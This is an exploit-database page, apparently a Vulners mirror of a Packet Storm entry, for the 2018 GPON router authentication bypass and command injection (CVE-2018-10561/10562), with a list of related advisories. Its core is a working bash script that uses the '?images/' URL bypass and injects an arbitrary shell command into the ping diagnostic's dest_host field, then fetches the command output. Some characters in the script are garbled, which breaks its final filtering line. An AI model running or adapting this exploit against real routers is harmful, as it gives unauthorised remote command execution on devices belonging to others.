GPON Router Authentication Bypass / Comand Injection

🗓️ 04 May 2018 00:00:00Reported by vpnmentorType

packetstorm🔗 packetstormsecurity.com👁 315 Views

GPON Router Authentication Bypass and Command Injectio

Reporter	Title	Published	Views	Family All 65
GithubExploit	Exploit for OS Command Injection in Dasannetworks Gpon_Router_Firmware	6 Jun 201809:43	–	githubexploit
GithubExploit	Exploit for OS Command Injection in Dasannetworks Gpon_Router_Firmware	15 May 201817:31	–	githubexploit
GithubExploit	Exploit for OS Command Injection in Dasannetworks Gpon_Router_Firmware	17 May 201822:03	–	githubexploit
0day.today	GPON Routers - Authentication Bypass / Command Injection Exploit	3 May 201800:00	–	zdt
ATTACKERKB	CVE-2018-10562	4 May 201800:00	–	attackerkb
ATTACKERKB	CVE-2018-10561	4 May 201800:00	–	attackerkb
BDU FSTEC	The vulnerability of the microprogramming software of the Dasan GPON router, related to deficiencies in authentication procedures, allows a hacker to gain full control over the device.	29 Mar 201900:00	–	bdu_fstec
BDU FSTEC	The vulnerability of the Dasan GPON router’s microprogramming software, related to the lack of measures taken to clean data at the management level, allows attackers to perform arbitrary actions with administrator privileges.	29 Mar 201900:00	–	bdu_fstec
Broadcom	BSA-2018-603	8 May 201800:00	–	broadcom
Broadcom	BSA-2018-604	8 May 201800:00	–	broadcom

`#!/bin/bash  
  
echo "[+] Sending the Commanda| "  
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices  
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null  
echo "[+] Waitinga|."  
sleep 3  
echo "[+] Retrieving the ouputa|."  
curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga  
  
`

04 May 2018 00:00Current

1.3Low risk

Vulners AI Score1.3

EPSS0.9995